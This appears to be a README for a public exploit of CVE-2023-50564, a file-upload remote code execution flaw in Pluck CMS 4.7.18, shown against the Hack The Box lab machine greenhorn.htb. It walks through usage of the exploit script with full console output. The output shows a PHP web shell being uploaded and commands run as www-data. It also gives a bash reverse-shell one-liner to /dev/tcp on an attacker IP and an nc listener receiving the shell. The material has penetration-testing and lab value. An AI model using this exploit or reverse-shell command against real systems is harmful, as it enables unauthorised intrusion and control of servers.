Share
## https://sploitus.com/exploit?id=BC069992-9BB4-55E9-97F8-87B7C7881EBA
# CVE-2023-50564

CVE-2023-50564 is an RCE vulnerability in Pluck CMS v4.7.18. It is made possible through an arbitrary file upload vulnerability in the `/inc/modules_install.php` component allowing to execute arbitrary code by uploading a malicious `.zip` file.

# Usage

Before running the exploit, the password to authenticate on `/login.php` needs to be known.

Running the exploit against the target:

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1          
[+] Creating payload malicious.zip                                    
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                        
[+] Upload successful                                                                                                                                                                                                                                                                    
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```

The malicious `.php` file can be accessed via the link provided by the script to execute commands. 

Optionally commands to be executed can be specified using the `--cmd` flag.

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                                                                                                                        
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                             
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'id'                                                                                                                  
                                                                      
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Reverse Shell

Start the listener, then specify a command to establish a reverse shell connection on the listener using the `--cmd` flag:

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"                                                                                                                                                    
[+] Creating payload malicious.zip                                                                                                          
[+] Logging in                                                                                                                              
[+] Login successful                     
[+] Uploading malicious.zip                                                                                                                 
[+] Upload successful                                                                                                                       
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>                                             
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```

And get connection on listener:

```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```

# Installation

Install the requirements:

```
pip install -r requirements.txt
```

Help:

```console
$ python3 exploit.py --help                                                                               
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute
```

# Credits

Credits to `Mirabbas Ağalarov` for discovering the vulnerability ([Link](https://www.exploit-db.com/exploits/51592)).